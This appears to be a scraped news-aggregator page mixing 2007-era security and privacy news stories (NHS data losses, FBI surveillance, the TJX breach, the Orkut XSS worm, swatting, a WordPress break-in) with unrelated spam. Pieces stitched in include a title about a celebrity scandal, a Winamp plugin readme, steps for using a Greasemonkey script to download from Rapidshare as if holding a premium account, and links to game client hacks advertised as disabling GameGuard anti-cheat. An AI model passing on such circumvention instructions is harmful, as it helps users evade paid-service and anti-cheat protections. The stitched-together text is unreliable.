daily online news

Gretchen Bareto Scandal this is taken after

Features:::.... - new: - works with Yahoo! Messenger 9.0! This is most probably the first Winamp plugin that supports this latest version! (also works with Yahoo! Messenger 8.1 or older)

Features:::....

- new: - works with Yahoo! Messenger 9.0! This is most probably the first Winamp plugin that supports this latest version! (also works with Yahoo! Messenger 8.1 or older)

- new: maximum 'Album' text increased to 50 characters

- fixed small bug - status was not changed for users who never changed their YM status

- new: supports changing the status when you are logged in with a non-default Yahoo! profile

- new: this homepage created!
- added 6 more placeholders: Album, Genre, Track No, Year, Volume, Channels - that makes a total of 14 !!
- status will NOT be changed if it is currently Invisible
- bug fix - winamp.exe still running as a process after closing (very sorry about that :|)
- default refresh interval is now one second; removed obsolete option to ask user if he is running YM 8

- does not require you to leave YM remember your user and password

- you can format the status with eight media details (most of the same details available in HyperIM's plugin, but with shorter names, and ofcourse not recursive)

- multiple lines in the status
- optional headphones in the status
- up to 255 characters in the status
- optional Busy or Idle icons, together or not with the headphones
- no advertising in the status, not at any time, like many other plugins do.

Installation and Help:::...

1. If you are upgrading from a previous version, close Winamp if it is currently running
2. Download the installer (see the head of this page), which is a ZIP file
3. The installer is inside the archive. Most probably you will be able to double click the file directly from the archive viewer to run the installer
4. If not, extract the file somewhere and run it from there.
5. After the installer is done, open Winamp, go to Preferences, click General purpose list item in lower left panel, and double click Yahoo! Messenger Now Playing to configure the plugin as you like it.

download here

Here is some info on how to download from RS.com as if you had a premium account
1. Download Firefox latest Edition then install it
2. Download Grease Monkey Extension
Here

Restart firefox then download this:
Here

unrar and drop the 9116.user.js in firefox
When you go to rapidshare.com you can use a download manager

TOYMAKER Apple has decided that Microsoft's Windows Genuine Advantage is so wonderful that it is trying to patent something similar.

Apple have been doing wonderful things this year to really miff its loyal fan base and it seems it wanted to close the year by nicking the thing that annoys even the most loyal Microsoft user.

The outfit has updated the patent application it calls "Run-time Code Injection to Perform Checks".

This patent tells the story of how Apple boffins invented the idea of a digital rights management system that could restrict use of an application to specific hardware platforms.

Apparently, the software phones home for an authenticity check.

If the software is pirated then Jobs Mob shall deem the software unworthy in its sight and make it unusable.

Currently, Apple does not dabble in the area of DRM-style security and would be well advised to stay away from it. After all WGA is one of the main reasons that people have stayed away from Vista.

It seems that Apple has been concentrating on its Iphone and Ipod gadgets so much that it has failed to notice that Microsoft got prior art on DRM that stuffs up the operating system and annoys the user.

The Tory party has put forward a rescue plan for the NHS IT system in the wake of the latest government data losses, which were revealed over the weekend. Nine English NHS trusts have owned up to large scale losses of personal data, and although in most cases the nature of this data has yet to be revealed, City & Hackney Primary Care Trust reportedly mislaid the names and addresses of 160,000 children.

Speaking on Radio 4's Today programme, Tory Shadow Health Secretary Andrew Lansley said that the losses illustrated the dangers of holding all NHS records on a single database that could be accessed by 300,000 individuals. The system need not however, he stressed, be entirely abandoned. Instead, data should be held on smaller, interoperable local databases.
Click here to find out more!

Records could then be shared when needed, with an audit trail held of individual accesses. The Department of Health argued, somewhat unconvincingly under the circumstances, that the central database would protect personal database because of the strength of its security systems. The Tory plan, however, appears to have merit in that it provides a viable, but more secure, way forward using the infrastructure that's being put in place under the government NHS plans. Effectively, this kind of approach could provide the government with an escape hatch, should it wish to use it.

The latest breaches, a total of ten across nine trusts, have emerged as part of the government's post-HMRC data security review. The City & Hackney loss occurred when a disc containing the data failed to arrive at an East London hospital, while other losses are though to have been of data stored on laptops and transferred on flash drives. It's worth noting that as this indicates poor handling practices for bulk data (precisely the problem that has been horribly exposed in government systems recently), neither the centralised system nor the Tory alternative is of itself a fix.

The Department of Health claimed that there is no evidence that the data might have fallen into the wrong hands, but said that the breaches were being dealt with locally by the individual trusts. Initially it said it did not have details of how many patients have been affected, but this morning it estimated a total of 168,000. It is, one might observe, a puzzle that the DoH seems unable to furnish details of the problem, but is able to say that there probably isn't one - how does that work?

It's also worth noting that, were it not for the HMRC blunder and the consequent security review being carried out by Cabinet Secretary Gus O'Donnell, all of the data losses now being reported would still have taken place, but few if any would have been revealed. So far the government has published one interim report on the HMRC incident and a progress report on the broader O'Donnell review. Full reports on both are due "in the spring." ®

The FBI is embarking on a $1 billion project to build the world's largest computer database of biometrics to give the government more ways to identify people at home and abroad, the Washington Post reported on Friday. The FBI has already started compiling digital images of faces, fingerprints, and palm patterns in its systems, the paper said.

In January, the agency--which focuses on violations of federal law, espionage by foreigners, and terrorist activities--expects to award a 10-year contract to expand the amount and kinds of biometric information it receives, it said.

At an employer's request, the FBI will also retain the fingerprints of employees who have undergone criminal background checks, the paper said.

If successful, the system, called Next Generation Identification, will collect the biometric information in one place for identification and forensic purposes,

FRANKLIN, N.H.—A New Hampshire business says a hacker rang up a $8,700 phone bill for one call to Saudia Arabia.
more stories like this

Michael Bednaz, owner of Hexa Interactive Communications, says the caller talked for 808 minutes and insists it wasn't one of his employees.

AT&T is suing him for not paying a $14,600 phone bill -- which includes the call to Saudia Arabia and several other overseas calls Bednaz says aren't his responsibility.

Bednaz says he doesn't use AT&T for long distance. The calls were made late at night when the business isn't open. Bednaz hasn't had any luck persuading AT&T the calls aren't his. The company sued him earlier this month.

Apple rumour website Think Secret is closing down as part of a legal settlement with the computer company.

Apple launched a lawsuit against the site in January 2005 after it published details of the Mac Mini two weeks before its official announcement.

Nick Ciarelli, the publisher of Think Secret, had refused to divulge his sources, prompting Apple to take legal action.

A court in California ruled in March 2005 that bloggers from Powerpage, Apple Insider and Think Secret had to reveal their sources, but Ciarelli refused.

Ciarelli insisted that the agreement was a "positive solution for both sides ".

"As part of the confidential settlement, no sources were revealed and Think Secret will no longer be published," an official statement said.

Ciarelli added that he would now concentrate on other journalistic opportunities. "I am pleased to have reached this amicable settlement, and will now be able to move forward with my college studies and broader journalistic pursuits," he said.

Retail giant TJX Companies and the Massachusetts Bankers Association announced on Tuesday that the company had settled lawsuits with every bank association and bank, save one, that had sued the company following the theft of credit- and debit-card data from its computer systems between

Under the terms of the agreement, TJX has denied all wrongdoing and will pay the banks a negotiated part of their expenses from the case, excluding attorneys' fees. In addition, three individual banks and the nearly 300 banks represented by the Connecticut Bankers Association, Maine Association of Community Banks, and Massachusetts Bankers Association will dismiss all of their claims against TJX. The associations will recommend that their members apply for part of the $41 million settlement offered by TJX to Visa issuers as part of a settlement with the credit-card company.

"Through that offer, TJX has agreed to fund up to $40.9 million in payments to Visa issuing banks which may have suffered damages as a result of the data breach," Daniel J. Forte, president of the Massachusetts Bankers Association said in a statement (PDF). "This alternative recovery solution will, in many cases, allow issuing banks to recover more than would otherwise be possible through existing recovery mechanisms."

The settlement ties up a number of legal loose ends for TJX, following its announcement nearly a year ago that a security breach of its transaction processing network had resulted in data thieves stealing information on 45.6 million credit- and debit-card accounts. Banker's groups sued the company for their members' costs in replacing the cards, but the judge handed the banks a significant loss when he refused to allow them to pursue the case as a class. Evidence presented in the lawsuits in August raised the estimate of the number of cards affected by the breach to more than 100 million.

Litigation following breaches at TJX and other retailers has convinced many merchants to minimize the amount of data collected in a transaction. However, Visa, whose cards accounted for about two-thirds of those stolen, has estimated that 3 out of 10 retailers have yet to comply with the industry's standard for data protection.

In its statement on the settlement, TJX stressed that the payment industry must also shoulder responsibility for better security.

"The TJX experience underscores broader challenges facing the U.S. payment card system that require urgent action by merchants, banks, payment card companies and associations, and we look forward to greater cooperation in order to better serve and protect customers," Carol Meyrowitz, CEO of the retailer, said in a statement.

TJX's previous estimate of the cost of the breach totaled $156 million through fiscal 2009, and includes the latest settlement and a settlement with consumers that is pending court approval.

A lawsuit brought by AmeriFirst Bank, of Union Springs, Alabama, remains unresolved as do state and federal investigations into the TJX breach.

Along with its approval of Google’s DoubleClick acquisition Thursday the Federal Trade Commission outlined some core privacy principles that may have a bigger impact than the merger over time.

While Google’s acquisition of DoubleClick is getting all of the attention (Techmeme, blog post and news story) these privacy proposals–and the debate that ensues–are likely to become a big deal.

These principles sound great in theory, but in reality there will be some hand wringing among Web publishers including giants like Google, Microsoft and Yahoo. Let’s dissect the FTC’s principles.

1. The FTC wants transparency and consumer control of data used for behavioral advertising. Fair enough. Who wouldn’t be for that? The FTC argues that existing privacy disclosures are “difficult to understand, inaccessible, and overly technical and long.” Hard to argue with point either.

Here’s the FTC’s proposal to remedy the issue:

Every website where data is collected for behavioral advertising should provide a clear, concise, consumer-friendly, and prominent statement that (1) data about consumers’ activities online is being collected at the site for use in providing advertising about products and services tailored to individual consumers’ interests, and (2) consumers can choose whether or not to have their information collected for such purpose. The website should also provide consumers with a clear, easy-to-use, and accessible method for exercising this option.

Why this won’t go over well: More consumer friendly disclosures should be a no-brainer. After all, the mutual fund industry did it a few years ago. The real haggling will be over how friendly these privacy statements become and how much a company has to disclose. Let’s ponder Company A, which takes your registration data, sells it to everyone, abuses the database and spams the hell out of you.

What exactly is Company A’s privacy statement going to look like? How about four bullet points (fancy graphic optional):

• We will take your data.
• We will share it with the world.
• We will spam you to death.
• The End.

No one would go along with that–even though those same points may be buried today’s privacy policies under four tons of legalese.

All of that brings me to the second part of this principle: An easy way for consumers to choose whether their information can be collected. The problem with advertisers is this: No one will choose to hand their data over if opting in and out becomes easier. Expect a lot of tap dancing over this principle.

2. Reasonable security, and limited data retention, for consumer data. The FTC argues that data collected for behavioral targeting may not be secured well. The FTC acknowledges that some of this data may be useless to a hacker, but you never know. There are two principles on the table here:

Any company that collects and/or stores consumer data for behavioral advertising should provide reasonable security for that data. Consistent with the data security laws and the FTC’s data security enforcement actions, such protections should be based on the sensitivity of the data, the nature of a company’s business operations, the types of risks a company faces, and the reasonable protections available to a company.

The problem with that proposal is that the term “reasonable security” is sketchy. Will Google be under the same standard as a medical information company?

And the other proposal, which covers how long companies should store data:

Companies should retain data only as long as is necessary to fulfill a legitimate business or law enforcement need. FTC staff commends recent efforts by some industry members to reduce the time period for which they are retaining data. However, FTC staff seeks comment on whether companies can and should reduce their retention periods further.

I could argue that the retention time shouldn’t exist at all. But that’s unrealistic. How much time is necessary? The good news is that this proposal is doable–it may just take legislators to force the issue. It is clear that 18 months doesn’t make the cut to the FTC.

3. Affirmative express consent for material changes to existing privacy promises. The FTC recognizes that businesses “may have a legitimate need to change their privacy policies from time to time,” but companies shouldn’t change practices willy nilly. Think shareholder approval meets privacy policies.

The proposal:

As the FTC has made clear in its enforcement and outreach efforts, a company must keep any promises that it makes with respect to how it will handle or protect consumer data, even if it decides to change its policies at a later date. Therefore, before a company can use data in a manner materially different from promises the company made when it collected the data, it should obtain affirmative express consent from affected consumers. This principle would apply in a corporate merger situation to the extent that the merger creates material changes in the way the companies collect, use, and share data.

This proposal sounds doable, but FTC may be barking up the wrong tree. The financial companies regularly change their privacy policies and tell me via some statement I rarely read.

4. Affirmative express consent to (or prohibition against) using sensitive data for behavioral advertising. The FTC says sensitive data shouldn’t be used for advertising when an individual can be tracked unless specifically authorized.

The proposal:

Companies should only collect sensitive data for behavioral advertising if they obtain affirmative express consent from the consumer to receive such advertising. FTC staff seeks specific input on (1) what classes of information should be considered sensitive, and (2) whether using sensitive data for behavioral targeting should not be permitted, rather than subject to consumer choice.

The big argument on this proposal will be what information is deemed sensitive. A bigger haggling point will be whether this targeting should be allowed at all. There’s a whole industry using behavioral targeting to get CPMs up. Expect a heated debate.

5. Using tracking data for purposes other than behavioral advertising. Should behavioral targeting data be tracked for anything other than advertising? There’s no FTC proposal on this one, but the commission is looking for additional comments about what secondary use of data is acceptable, whether the information is being used today and what protections are needed. It’s safe to assume the FTC will get some input on all sides on this item.

Half of all spam involves lottery scams making them one of the fastest growing areas of cyber-crime, according to research commissioned by Microsoft across Germany, Italy, Denmark, the UK and The Netherlands.

The problem is worse in the UK where around 62 per cent of spam emails are lottery scams.

Disturbingly, 16 per cent of those who received 'lottery spam' opened at least some of them, and 10 per cent have replied to one of these emails and 20 per cent admitted to clicking on links inside the emails.

Three per cent of respondents said they have lost money to scammers over the past 12 months.

"Internet lottery scams are one of the fastest growing areas of cyber-crime, " said Ed Gibson, chief security advisor for Microsoft in the UK.

"The scams are of increasing concern to international law enforcement, offering criminals a low-risk opportunity to steal money from internet users."

Microsoft said that the scams are particularly insidious in that they work purely through social engineering, rather than by exploiting a technical flaw in software.

As a result, they represent huge challenges to law enforcement, as they are extremely difficult to track, and even more difficult to catch and prosecute fraudsters.

"Lottery scams entice people with the false promise of large sums of money for little or no effort on their part," said Jacques Erasmus, a security specialist from Prevx and former 'white hat' hacker.

"Once a person is involved in the scam, they are asked to pay certain amounts of money to expedite the process such as an up front 'administration fee'. They end up not making a single pound."

A study by the Internet Crime Complaint Center revealed that advance fee frauds such as lottery scams are the costliest type of internet fraud with a median of $5,000 per victim.

"We want to raise awareness of a growing type of internet crime. Make no mistake, the criminals that perpetrate these crimes are extremely clever and devious, and unfortunately successful," added Gibson.

By now it's well known that FBI agents can't always be troubled to get a court order before going after a surveillance target's telephone and internet records. But newly released FBI documents show that aggressive surveillance tactics have even caused friction within the bureau.

"We deal mostly with the fugitive squad here, and, like in many other offices, these guys have a reputation for cutting corners," a surveillance specialist at the FBI's Minneapolis field office complained in an internal e-mail last year. "I'm not bashing them; it's the way they do business. Getting a court order is the absolute last step, if they have to.

"Before I had a blowup with a particular agent ... we were constantly asked to call our contacts at service providers to see if we could get various information without having to get a court order," the message continues. "This gets old, believe me. ... Doing this once or twice to help out turns into SOP (standard operating procedure) ... It's expected, and you're criticized as a tech agent if you refuse to do this later on."

The revelation is the second this year showing that FBI employees bypassed court order requirements for phone records. In July, the FBI and the Justice Department Inspector General revealed the existence of a joint investigation into an FBI counter-terrorism office, after an audit found that the Communications Analysis Unit sent more than 700 fake emergency letters to phone companies seeking call records. An Inspector General spokeswoman declined to provide the status of that investigation, citing agency policy.

The June 2006 e-mail (.pdf) was buried in more than 600-pages of FBI documents obtained by the Electronic Frontier Foundation, in a Freedom of Information Act lawsuit.

The message was sent to an employee in the FBI's Operational Technology Division by a technical surveillance specialist at the FBI's Minneapolis field office -- both names were redacted from the documents. The e-mail describes widespread attempts to bypass court order requirements for cellphone data in the Minneapolis office.

Remarkably, when the technical agent began refusing to cooperate, other agents began calling telephone carriers directly, posing as the technical agent to get customer cellphone records.

Federal law prohibits phone companies from revealing customer information unless given a court order, or in the case of an emergency involving physical danger.

The documents are the second batch released by the EFF after winning a Freedom of Information Act lawsuit last May. The first set of documents shed light on the breadth and sophistication of the FBI's national wiretapping system, which is wired into telecom switches around the United States under the terms of the 1994 Communications Assistance for Law Enforcement Act -- a law that was extended to broadband internet switches in May of this year.

The new documents detail how a little-known FBI telephone intercept unit has developed a powerful cellphone tracking technology that agents use to monitor the physical movements of surveillance targets, even on phones that are not GPS equipped.

Originally developed to capture and arrest computer hacker Kevin Mitnick in 1995, the system today relies on a mobile FBI van that has access to a wireless carrier's cell site tracking information in real time. A special surveillance unit called the Wireless Intercept and Tracking Team (WITT) operates the van, using the cell site location to get to the approximate location of the cellphone customer, then uses direction-finding gear to zero in on the target.

The technical agent complained in the e-mail that FBI agents looking for a suspect tend to skip gumshoe investigative techniques in favor of the slick tracking van. "These guys always want to take the WITT vehicle out and drive around half of town (sic) to find the guy," the agent wrote.

The tracking system is part of the FBI's Digital Collection System, or DCS, a suite of software packages used for criminal and intelligence phone taps, which relies on a massive interlinked fiber-optic network that connects surveillance terminals around the country.

In brief, the mobile tracking system works as follows:

1. FBI agents investigating a case prepare a court order saying a cellphone number is likely relevant to an ongoing investigation, and a judge signs off on it.
2. The court order is faxed to a mobile carrier, which then turns on surveillance in its switches, and begins delivering call data and cell site information to the FBI's DCS 3000 software.
3. That software keeps track of which cellphone towers a phone uses or pings. A central FBI database translates a mobile carrier's cell tower code to latitude and longitude coordinates.
4. The software sends the coordinates to the agents and technical personnel in the mobile unit who then drive to the general area. But since cell tower information is not precise, agents in the van use antenna array connected to tracking software to zero in on the cellphone.

The FBI's technology office trumpeted the tracking function of the DCS 3000 software in a letter to the FBI director, boasting that it was used after a December 2005 North Carolina kidnapping to help find the victim unharmed.

Transmigration of the SQL

The path to enlightenment got a little shorter for the citizens of Tucson, Arizona and they have a hacker half-way around the world to thank.

An Indonesian man who goes by the handle Hmei7 bypassed the city's firewall and executed a SQL injection on the website of the Tucson Police Department. That gave him access to the media section of the department's site, where he changed the titles of all the media releases to "Hmei7 has touched your soul."
Click here to find out more!

A quick web search suggests the city isn't the first group to be blessed by the web defacer. Indeed, he's also kissed the souls of people in Okaloosa County, Florida, if this press release is to be believed.

Tucson police officials were alerted to the hack two weeks ago, after a website visitor spotted the messages. They took the site down immediately and only managed to bring it back up in the last 24 hours.

No doubt, the two-week disruption came as an inconvenience to some. But we'd argue it was a small price to pay if it leads the way toward Nirvana. ®

Google's Orkut social networking site was hit by a quick-spreading worm that managed to infect a large number of users when they viewed messages that came from friends who were already exposed.

Infected users became part of a community dubbed "Infectatos pelo Virus do Orkut," which loosely translates from Portuguese to mean "infected by the Orkut Virus." More than 655,000 members belonged to the group at time of writing, although some people may have joined voluntarily rather than being forcibly corralled into it by the worm. Within hours, Google appears to have closed the cross-site scripting (XSS) error that made the attack possible.

The incident is the latest reminder of the risks that lurk in social networks, which more and more people use to keep track of business contacts, schedules and other important information. In many respects, it hearkens back to the Samy Worm, a piece of Javascript that in 2005 infected more than 1 million MySpace users. Such attacks are significant because they require nothing more than a victims browse a trusted website.

"It wouldn't have taken much to turn this into an actual malicious attack," said David Maynor, CTO of security services firm Errata Security. "Attacks like this are shifting the paradigm where you just shouldn't trust anything."

Maynor said it would have been relatively trivial for the authors of the Orkut worm to steal an Orkut user's logon credentials, which in most cases are also used to access a person's Google mail and calendar accounts, web searches and recently browsed map locations.

The worm appended a piece of malicious, Flash-based Javascript to a user's profile and then sent a message to all the victim's friends. When friends viewed the message they became infected as well.

It burrowed in using a hole created by an XSS error in code created by Google webmasters. XSS vulnerabilities allow attackers to inject malicious code by tricking a browser into believing the file is coming from a trusted website. XSS bugs have emerged as a major source of security vulnerabilities that over the past year have tripped up Google, Yahoo and many other major web destinations.

The Orkut worm exploited a hole on the Google-owned site that allowed a Javascript file titled virus.js to be fetched from an location at MyOpera and injected into users' profiles.

As is so often the case with XSS-based attacks, the Orkut worm was mitigated by the use of the NoScript plugin. It runs on top of the Firefox browser and prevents the execution of Java, Javascript, Flash and other potentially dangerous code on untrusted websites. ®

At the end of 2006, the FBI's Telecommunications Intercept and Collection Technology Unit compiled an end-of-the-year report touting its accomplishments to management, a report that was recently unearthed via an open government request from the Electronic Frontier Foundation.

Strikingly, the report said that the FBI's software for recording telephone surveillance of suspected spies and terrorists intercepted 27,728,675 sessions.

Twenty-seven million is a staggering number given that the FBI only got 2,176 FISA court orders in 2006 from a secret spy court using the Foreign Intelligence Surveillance Act.

According to the math that means each court order resulted in 12,742 "sessions," all in regards to phone, not internet, surveillance.

FISA watchers have long wondered whether FISA warrants covered more than one person. Knowing how many calls or text messages the FBI captured could add a piece to the puzzle.

Unfortunately, nothing in the documents turned over yet to the Electronic Frontier Foundation explain what a session is. Does it refer to one session of listening in on a target's conversation, even if it is minimized for not being relevant? Does it include text messages? Does the incoming call number and the recording of the call count as two sessions? Do cell phone pings that reveal the general location of a target count as a session? Unknown.

Steven Aftergood, who runs Secrecy News for the Federation of American Scientists, says it's an odd, and not so useful statistic:

I've never seen a number like that. When I hear 27 million sessions that sounds like they are talking about individual communications that were monitored for each individual target.

Aftergood thinks that if you take the number of targets and add them up, it's not that crazy a number. He also suspects that there are likely less than 2,100 foreign surveillance targets and that each target likely gets multiple orders - one for a fax line, one for a cell phone, one for a secret house search, etc.

It's a surprising statistic to keep because it doesn't tell you much. What you want to know is how many of the foreign intelligence surveillance sessions were of significance. If only three out of 27 million were useful, that would tell you something, but one number without the other is meaningless.

Of note is that the software at issue, the DCS-5000 gets information from carriers after they turn on surveillance on their switches once they get a court order (CALEA mandates the switches be wiretap-compliant). That means this number ostensibly has nothing to do with the government's secret warrantless wiretapping program, or the government's data-mining of billions of call records.

See the 27 million figure here (.pdf) (p. 35) and drop your reasoned or snarky hypotheses in the comments.

Check Wired.com Wednesday evening for a fuller story on the Freedom Of Information Act-obtained documents.

For a primer on the FBI's Digital Collection System and how it works with wiretap-friendly telecom switches, check this August story: Point, Click ... Eavesdrop: How the FBI Wiretap Net Operates

Social networking giant Facebook has named several defendants in a lawsuit alleging unlawful access to its servers in an attempt to steal information about its users.

Canadian porn site operator SlickCash allegedly tried to access Facebook's servers at least 200,000 times over two weeks in June using an automated script that attempted to harvest information from other Facebook users.

The suit was amended to name SlickCash along with Toronto residents Brian Fabian, Josh Raskin and Ming Wu, as well as Istra Holdings, which owns SlickCash.

The lawsuit (PDF) was originally filed in June in a US District Court in California against 10 unknown individuals and 10 unknown companies.

But the names were added after Facebook obtained court orders forcing service provider Look Communications to hand over subscriber information connected to two IP addresses associated with the attack.

"These requests for information from Facebook generated error messages and were detected as unauthorised attempts to access and harvest proprietary information belonging to Facebook," said David Chiappetta, Facebook's lawyer.

The legal filing claims that the attack cost Facebook over $5,000. The company is seeking undisclosed financial damages.

Fresh evidence has emerged that the US government's warrantless wiretapping program predates the 9/11 terrorist attacks.

Secret surveillance operations that enabled the National Security Agency (NSA) to access telecommunications traffic data have been in place since the 1990s, according to the New York Times. In an attempt to gain intelligence on narcotics traffickingThe NSA forged an uneasy alliance with telcos to gather data on phone calls and emails from the US to Latin America.

The alliance between the US government and telcos to gather call records involving thousands of US and foreign citizens was constrained by legal worries and fears of public exposure. Even so, it took until 2004 for one unnamed carrier to break ranks and refuse to provide customer data, the paper reports.

Separately, US carrier Qwest refused to provide NSA spooks with access to local communications switches (a move that would have allowed surveillance of domestic phone calls without a court order) in early 2001 - before the devastating World Trade Center attacks in September that year.

Negotiations between the NSA and AT&T in February 2001 allegedly involved replicating a New Jersey network centre to allow the US signals intelligence "access to all the global phone and email traffic that ran through it". The incident has become one aspect of a lawsuit which also brings in allegations that Verizon set up a dedicated fibre-optic line from New Jersey to a large military facility in Quantico. Spooky.

An AT&T technician at the time has provided evidence supporting the allegations. However, other AT&T technicians are due to testify that the project was confined to improving internal communications within the NSA.

News that the NSA eavesdropped on the international communications of terrorism suspects making calls from the US without warrants first emerged two years ago. The latest revelations that this was a development of a much longer running practice that also involved US domestic calls come as the Bush administration is pushing Congress to pass legislation indemnifying telecoms carriers from liability in assisting law enforcement with warrantless eavesdropping programs. Since 2005, the warrantless wiretapping program has become the topic of 40 lawsuits. ®

Player Name

Guild Name

Microsoft Corp. confirms that it is investigating reports that a security update for Internet Explorer issued last week has crippled some users' ability to get on the Web with the browser.

Users started posting messages to multiple Microsoft support newsgroups almost immediately after Microsoft released the MS07-069 security bulletin on Dec. 11, saying that they were unable to connect to the Internet, either because IE refused to open or because when it did open, it could not reach various sites.

"About 60% of the time, I would get an 'Internet Explorer has encountered a problem and must close' dialog," reported Bill Drake on the Windows Update newsgroup. Others echoed those comments on IE-specific forums, noting that both IE6 and IE7 balked at loading, or while loading, some pages, particularly home pages, on both Windows XP and Windows Vista machines.

Harold Decker, operations manager at San Diego-based Gold Peak IndustriesNA Inc., started fielding calls from users last Wednesday morning as soon as people hit the office. "I stopped everyone who hadn't installed the update from installing it, after four PCs out of 14 had the problem," said Decker, who manages a total of 35 Windows XP SP2 machines. "We're a pretty plain shop; all our systems run Windows XP SP2 and IE6," said Decker. "But some kept crashing. It seemed limited to the window that was opened, and changing the home page to something simple, like a blank page, gave a better success rate."

Decker cited numerous brand-name sites that workers at Gold Peak couldn't reach without crashing IE, including Federal Express' and Lowe's Home Improvements.

Microsoft said it is on the case. "Our customer service and support teams are investigating public claims of a deployment issue with Microsoft Security Bulletin MS07-069," Microsoft's Mark Miller, director of security response, acknowledged in an e-mail. "If necessary, Microsoft will update the Knowledge Base article associated with MS07-069 with detailed guidance on how to prevent or address these deployment issues," Miller added.

Other users on the support forums weren't much help, except to suggest uninstalling last Tuesday's security update. That's what Decker did. "We uninstalled [MS07-069] and have had no problems since then," he said.

It's download time again for Mac OS X users, as 31 new security-related fixes for both Tiger and Leopard were made available by Apple Monday afternoon.

The security patches are mostly geared for users of Mac OS X 10.4, known as Tiger, but there's a bunch as well for version 10.5, known as Leopard. They should be automatically pushed to Mac users through the Software Update function, but you can also go to Apple's Web site and download the patches.

A number of serious vulnerabilities, such as ones that could lead to a malicious attack on your system, are fixed with the latest update. This includes several flaws that could lead to a remote attacker executing malicious code on a Mac in programs like Address Book, the Safari browser's RSS feed, and CUPS (common Unix printing system), among other things.

Apple updated QuickTime last week in order to fix an important flaw in that program. As part of Monday's patches, Apple also shipped a patch for Windows users of Safari that was addressed for Mac users as part of the larger series of patches.

Ohio's electronic voting systems have such significant security vulnerabilities that the machines do little to ensure the integrity of the elections, stated a report released on Friday by Ohio's Secretary of State.

The report, dubbed the Evaluation and Validation of Election Related Equipment, Standards and Testing (EVEREST), described the conclusions of two analysis firms -- Denver-based SysTest Labs and Columbus, Ohio-based MicroSolved -- and three academic teams to test election systems made by Premier, ES&S and Hart InterCivic. The manufacturers' systems failed to meet any of twelve baseline security criteria -- such as the use of a firewall, end-to-end encryption and secure development practices -- except for ES&S's system, which met one of the criteria.

Because of the lack of effective security measures, the report's authors stated that the integrity of the vote “is provided purely by the integrity and honesty of election officials.”

“The results underscore the need for a fundamental change in the structure of Ohio’s election system to ensure ballot and voting system security while still making voting convenient and accessible to all Ohio voters, “ Jennifer Brunner, Ohio's Secretary of State, said in a statement published on Friday. “In an era of computer-based voting systems, voters have a right to expect that their voting system is at least as secure as the systems they use for banking and communication."

Ohio, and at least a handful of other states, had problems with election machines during the 2006 general election. Many security researchers have focused on Diebold Election Systems' machines, following a leak of some of the source code used in that system. In 2006, a problem with an election system's ballot configuration likely confused voters in Florida, leading to a much higher-than-normal undervote for a contested seat in the U.S. House of Representatives.

All three voting machine makers -- Premier, ES&S and Hart -- took issue with the EVEREST report.

"We can say that, based on our initial review, we strongly disagree with some of the technical findings in the report," ES&S said in a statement. Hart and Premier (PDF) also posted statements on the report.

Secretary Brunner recommended that Ohio move to central counting of ballots, allowing absentee voting, and eliminate voting that does not create a tangible record of the vote, relying on optical scan ballots.

A California family that found their apartment surrounded by more than a dozen heavily SWAT armed officers are among the latest victims of swatting, a crime designed to elicit an emergency response by reporting a bogus 911 call.

Officers from the Salinas Police Department rushed to the apartment last Wednesday after receiving a report from someone claiming to be a 15-year-old boy saying three men wielding AK-47 assault weapons were trying to break into his apartment. The caller said he was hiding in a closet to elude the gunmen.

After police evacuated a mother and daughter from the apartment, they discovered another resident, a 15-year-old boy, had been holding an online chat with a person believed to be connected to the dangerous prank. The online acquaintance, who said he was located in Chicago, asked the boy if he heard any sirens approaching around the same time the police were arriving.

Swatting uses a combination of social engineering, phone phreaking and computer hacking to harass individuals. In many cases, the swatter will trick the victim into divulging a physical address and then use a VoIP system to make it look like the victim has initiated an emergency call from his address. This often prompts a response from SWAT teams who conduct emergency raids on the homes of people whose numbers were spoofed.

In the past several weeks, four individuals have pleaded guilty to participating in a series of swatting hoaxes that over a course of five years snared as many as 100 victims and losses of more than $250,000. They face maximum penalties of five years each in prison and fines of $250,000.

A suspect in a separate swatting incident in Orange County, California, faces charges including computer access and fraud, false imprisonment by violence, falsely reporting a crime and assault with an assault weapon by proxy. ®

1- NoDC Only Client For Version 1.139
Click Here

2- NoDC + CursingFilter
Click Here

3- NoDC + CursingFilter + ZoomHack & It's Reverse
Click Here

4- NODC + Cursing Filter + Zoomhack and it's reverse + No GameGuard
Click Here

GreYFoX_Client_Pack.rarGreY FoX Client Pack 8MB Contains all The Clients
Click Here

GreYFoX advise you to use NoDc only number 1 or 2 the rest is still a bit not stable

Note:
Download this to View The file GFXGTi.nfo for instructions it's a Program called DAMN NFO Viewer
Click Here


1- Prevents the DC Box after the message "Cannot connect Due to server traffic"
2- Same as 1 + You can say anything in chat
3- Same as 2 + you can ZOOM out and in indefinitely (infinitely)
4- Same as 3 + Game Guard Doesn't Protect the Game anymore

Remember To Check The GFXGTi.nfo with the Viewer i linked up there

credits to GreYFoX

BANGALORE: Karnataka police's Cyber Crime wing has arrested a 12-member gang involved in various cases of hacking on-line bank accounts and transferring funds amounting to several lakhs of rupees.

The police succeeded in unearthing the fraud when they arrested the mastermind, Joseph, from a city cyber cafe which he had been frequenting, on the basis of a complaint from Carl Braganza, HR Manager of Analog Infotech India Ltd.

He had stated that he had been defrauded to the tune of Rs 1.27 lakh by some unidentified hackers, according to a release from CoD (Corps of Detectives), Economic Offences.

Joseph, a diploma holder in computer science, hailing from Virudanagar district in Tamil Nadu used to hack into accounts of persons using "key logger" software.

From the available e-mail accounts of Joseph, more than 100 bank account numbers, passwords and other details of individuals have been obtained.

HDFC Bank, Citi Bank, Axis Bank and ICICI Banks have confirmed the authenticity of about 70 existing accounts and passwords gathered by CoD officers from Jospehs's e-mail accounts.

Investigation revealed that out of 70 accounts, 17 have already been successfully hacked by Joseph with the help of his associates. Police have succeeded in solving seven cases out of the 17, involving illegal transfer of funds to the tune of Rs seven lakh and further investigation was on.

Joseph's 11 associates also have been arrested.

An intrusion involving a stolen cookie and an unpatched PHP application has lessons for all site operators

A recent Monday morning brought a nasty surprise. A hacker had gained access to a web site I run, and planted a script engagingly entitled “Magic Include Shell WordPress Edition”, buried under an innocent-looking directory called images in the uploads section of the WordPress blog installation.

The hacker chose a Friday evening to start spitting out trackback spam, where ad-laden comments are automatically posted to other blogs, hoping that the activity would attract little attention over the weekend.

Shutting down the script was easy; but how did the intruder gain access? Could there be other sinister scripts or executables lurking on the server? How could the server now be secured?

It was the cue for hours spent trawling through Apache logs, consulting with users and developers of open-source software used on the site, and inspecting server backups to check the state of files. We think that the problem began with a stolen cookie, escalated by a security issue in a PHP application that was not patched with the latest update, and resulting in the hacker having free ability to upload files and scripts to the web site, wherever the web server had permission to write.

